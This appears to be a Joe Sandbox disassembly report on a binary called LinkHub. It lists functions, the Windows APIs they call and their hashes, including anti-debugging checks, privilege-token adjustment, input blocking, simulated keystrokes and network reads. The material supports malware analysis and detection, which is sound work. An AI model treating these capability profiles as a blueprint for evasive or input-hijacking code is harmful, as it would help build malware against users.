                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    • Opcode ID: 587359336e03013cb8f7bd01a15f50bfa724064d737e804eb2e375167198953c
                                                                    • Instruction ID: ecbb21135099693bf22301d3d72d20417cc421e2fe694aa821a7d28226ca2b68
                                                                    • Opcode Fuzzy Hash: 587359336e03013cb8f7bd01a15f50bfa724064d737e804eb2e375167198953c
                                                                    • Instruction Fuzzy Hash: DF11AC71501304FFDB109BA4CC09BAE7BBAEF64355F14801AEA55D7320C735AE41CB60
                                                                    Function 00CEA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00CEA5BD
                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CEA6D0
                                                                      • Part of subcall function 00CE42B9: GetInputState.USER32 ref: 00CE4310
                                                                      • Part of subcall function 00CE42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE43AB
                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CEA5ED
                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CEA6BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                    • String ID: *.*
                                                                    • API String ID: 1972594611-438819550
                                                                    • Opcode ID: 7f3c492c5c8ae47411edd0b1e79af5a1af17e07ea96c74b5e27a71c5c7f9dfb7
                                                                    • Instruction ID: 4428980e62c897ce3c0495f016a89e95e33151d985bcaadd03ca83bab9d5c421
                                                                    • Opcode Fuzzy Hash: 7f3c492c5c8ae47411edd0b1e79af5a1af17e07ea96c74b5e27a71c5c7f9dfb7
                                                                    • Instruction Fuzzy Hash: 6341737190024AAFCF14DFA5C949BEEBBB9EF05310F144056F819A21A1EB30AF44DF61
                                                                    Function 00C722AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DefDlgProcW.USER32(?,?), ref: 00C7233E
                                                                    • GetSysColor.USER32(0000000F), ref: 00C72421
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00C72434
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Proc
                                                                    • String ID:
                                                                    • API String ID: 929743424-0
                                                                    • Opcode ID: ce184dd5e2b85ce4d1ec5c009cd961ca8df65ee88d1ad8d4e264d31141e6102a
                                                                    • Instruction ID: f93a47f6afc172254e11e6035eb74303f291e7036f8182cf4e2ad5b79b130f20
                                                                    • Opcode Fuzzy Hash: ce184dd5e2b85ce4d1ec5c009cd961ca8df65ee88d1ad8d4e264d31141e6102a
                                                                    • Instruction Fuzzy Hash: D6817DF0108580BEE2386A3E8D9DFBF255EDB42300F15810AF51AD66E6CD59CF01D276
                                                                    Function 00CF2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CF3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CF3AD7
                                                                      • Part of subcall function 00CF3AAB: _wcslen.LIBCMT ref: 00CF3AF8
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CF22BA
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF22E1
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00CF2338
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF2343
                                                                    • closesocket.WSOCK32(00000000), ref: 00CF2372
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 1601658205-0
                                                                    • Opcode ID: d54d88024215b1e10806761b4be458e2c8170e2ae937fccfd7e43ca1c0e7aea2
                                                                    • Instruction ID: 379d917429c8ef9cd883ffd79e4bea656c0aa6d0fef1fe279e33767c6bef372f
                                                                    • Opcode Fuzzy Hash: d54d88024215b1e10806761b4be458e2c8170e2ae937fccfd7e43ca1c0e7aea2
                                                                    • Instruction Fuzzy Hash: CE51C575A40214AFD710EF64C886F2A77E9AB44758F08C098FA599F3D3C770AD42DBA1
                                                                    Function 00D026DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: fc56f6625832c691317c63e0043b520ba6dfabfd4f3686c1fb1c12115ec1ada8
                                                                    • Instruction ID: db359a6f6a2dbc59ea2eef0e1399ea1fe108cde18a1b3cd1c3b32cffc6f1209d
                                                                    • Opcode Fuzzy Hash: fc56f6625832c691317c63e0043b520ba6dfabfd4f3686c1fb1c12115ec1ada8
                                                                    • Instruction Fuzzy Hash: 4F21D1317022109FD7109F2AC848B6A7BA9EFC5314B588069E84ECB391C771ED42CBB0
                                                                    Function 00CED889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00CED8CE
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00CED92F
                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00CED943
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                    • String ID:
                                                                    • API String ID: 234945975-0
                                                                    • Opcode ID: ab1d45d963151e8e7db4732e7a036fb8caaf10bdc8d1f2215f6b09d49a9231b8
                                                                    • Instruction ID: 0d2378b1876130bdbfda55b93d256fda2e840e02bfd0848a4d7d396c07f18e25
                                                                    • Opcode Fuzzy Hash: ab1d45d963151e8e7db4732e7a036fb8caaf10bdc8d1f2215f6b09d49a9231b8
                                                                    • Instruction Fuzzy Hash: 97219071500745AFEB30DFA6DC89BAA77F8AB41314F10441EE65BD2152DB70EE05DB60
                                                                    Function 00CDE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,00CB46AC), ref: 00CDE482
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00CDE491
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDE4A2
                                                                    • FindClose.KERNEL32(00000000), ref: 00CDE4AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                    • String ID:
                                                                    • API String ID: 2695905019-0
                                                                    • Opcode ID: f6b59987af718c171f43b5bb6d5ad5d97837e87f7f08a02994b6c7c41c468d37
                                                                    • Instruction ID: 3248b451ce483bca3e5ac60e2ec6772a11223de27b43e8cb367afbf05c6cb46e
                                                                    • Opcode Fuzzy Hash: f6b59987af718c171f43b5bb6d5ad5d97837e87f7f08a02994b6c7c41c468d37
                                                                    • Instruction Fuzzy Hash: 57F0A030411A1057D21077B8AC0D9BE7A6EAE02335B504703F93AC22E0DB789A9586AA
                                                                    Function 00CCE5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID: %.3d$X64
                                                                    • API String ID: 481472006-1077770165
                                                                    • Opcode ID: 3aa2b406fce336e31a260de0192cdda1e9ea1fd5dae5f8d158d4b92012bdf4d9
                                                                    • Instruction ID: 02dc9a6e838cf6f09135b990281a970d8412a64e3708a1e94eb0e6ac77634bfa
                                                                    • Opcode Fuzzy Hash: 3aa2b406fce336e31a260de0192cdda1e9ea1fd5dae5f8d158d4b92012bdf4d9
                                                                    • Instruction Fuzzy Hash: 6FD012B1C1420CDACB90D691DC49EB9737CAB19300F10445AF906D2000E6349908A725
                                                                    Function 00CA2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CA2A8A
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CA2A94
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00CA2AA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 332cbc8e9effd69d3573f2ea7238c93baef69efc82a41930e20030db8ac15e48
                                                                    • Instruction ID: f86236c60c7bc0c588acbb80d5a0cda286f1896558e4f40423c245a1f162f5a2
                                                                    • Opcode Fuzzy Hash: 332cbc8e9effd69d3573f2ea7238c93baef69efc82a41930e20030db8ac15e48
                                                                    • Instruction Fuzzy Hash: D531D375901328ABCB21DF68D98879DBBB8AF08310F5042DAE81CA7260E7309F858F55
                                                                    Function 00CD2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C9014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C909D8
                                                                      • Part of subcall function 00C9014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C909F5
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD205A
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD2087
                                                                    • GetLastError.KERNEL32 ref: 00CD2097
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                    • String ID:
                                                                    • API String ID: 577356006-0
                                                                    • Opcode ID: 7cce72deb65bca9bbb6ba88f2274560c7b5a6d8a5aa53c78ffd51db6aa54e44b
                                                                    • Instruction ID: 0dd6b77c76e9bafe4394e762c1c529ebe9de06b71bceeb3802966b66c13945b4
                                                                    • Opcode Fuzzy Hash: 7cce72deb65bca9bbb6ba88f2274560c7b5a6d8a5aa53c78ffd51db6aa54e44b
                                                                    • Instruction Fuzzy Hash: C01191B1414305AFD728EF54DCC6E6BBBBDEB44710B20851EF15A97251DB70BC41CA64
                                                                    Function 00CDECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00CDED04
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID: DOWN
                                                                    • API String ID: 2434400541-711622031
                                                                    • Opcode ID: 4abcdab3c0c0dc2f161bf512a74976784ca03df93763af19106621298a1c0eff
                                                                    • Instruction ID: fc1a5bcd1889d27122a74b5bc3416e08865ab37bb6f114bb521a790f020ad337
                                                                    • Opcode Fuzzy Hash: 4abcdab3c0c0dc2f161bf512a74976784ca03df93763af19106621298a1c0eff
                                                                    • Instruction Fuzzy Hash: C8E0862A1AE7213CBD0831187D0AEF7034C8F12734B114147FD10D81C0ED509E8650B8
                                                                    Function 00CCE652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00CCE664
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID: X64
                                                                    • API String ID: 2645101109-893830106
                                                                    • Opcode ID: 8f1b441fa42ab8c66cf6fa96e3982ee05c2c073d90f079ad29f33c67ef2805cd
                                                                    • Instruction ID: e4b92dd20bd50a4b78d5569cfe66ee03a6489c4c42088f41b34e0cac602de558
                                                                    • Opcode Fuzzy Hash: 8f1b441fa42ab8c66cf6fa96e3982ee05c2c073d90f079ad29f33c67ef2805cd
                                                                    • Instruction Fuzzy Hash: 7BD0C9B481111DEACB90CB90EC88ED9737CBB04304F100656F14AE2100D73095488B24
                                                                    Function 00CE41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00CF52EE,?,?,00000035,?), ref: 00CE4229
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00CF52EE,?,?,00000035,?), ref: 00CE4239
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 12556fddaa6a74d5578d4187923a1a3599802fcd25e77d7fcc8bb84d71b687b5
                                                                    • Instruction ID: 3c36f3cfdc5c55de14c37939654b94dd9d88d4621b91aaa2959e6db069dacbd3
                                                                    • Opcode Fuzzy Hash: 12556fddaa6a74d5578d4187923a1a3599802fcd25e77d7fcc8bb84d71b687b5
                                                                    • Instruction Fuzzy Hash: 03F0E5306003296AE72456A69C4DFEB366EEFC5761F000176F609D2291D9709E40C6B1
                                                                    Function 00CDBBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CDBC24
                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00CDBC37
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: InputSendkeybd_event
                                                                    • String ID:
                                                                    • API String ID: 3536248340-0
                                                                    • Opcode ID: 70650c19b7867309daf14cec8790d6cdd602ffe0e11475b2a5ebe5e78367dde0
                                                                    • Instruction ID: 91d8a99e5d94aeb93f7b12de88be0bfbf76d90d5e566a88a948adbf04f72e938
                                                                    • Opcode Fuzzy Hash: 70650c19b7867309daf14cec8790d6cdd602ffe0e11475b2a5ebe5e78367dde0
                                                                    • Instruction Fuzzy Hash: DFF01D7181424DABDB059FA5C805BBE7BB4FF04309F04840AF955E5292D7798611DFA4
                                                                    Function 00CD1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CD1B48), ref: 00CD1A20
                                                                    • CloseHandle.KERNEL32(?,?,00CD1B48), ref: 00CD1A35
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: 61b101924cda862003afa8c71ed78f0f452a0379fc322cd8d172e55b490865b0
                                                                    • Instruction ID: aacc603bf90a81aec6562b9fde30cab5ad2b40afa8e278a6c448d40f1278e823
                                                                    • Opcode Fuzzy Hash: 61b101924cda862003afa8c71ed78f0f452a0379fc322cd8d172e55b490865b0
                                                                    • Instruction Fuzzy Hash: BCE0BF72014610BFEB252B50FC09F7677A9FF04311F24891EF9A980570DB626C91EB54
                                                                    Function 00CEF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 00CEF51A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: bc961832bb93807070325d690911e7c39bd61271a448e018ce8622b116edf8d2
                                                                    • Instruction ID: 15c6eb84880019b40b9852bb83b8c4d001af0677c9c9c406902fe64d9917f233
                                                                    • Opcode Fuzzy Hash: bc961832bb93807070325d690911e7c39bd61271a448e018ce8622b116edf8d2
                                                                    • Instruction Fuzzy Hash: B6E04F322002159FC710AF6AD844A9AF7E8AFA8761F00846AF94EC7351DA70F9418BA0
                                                                    Function 00C90D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00C9075E), ref: 00C90D4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
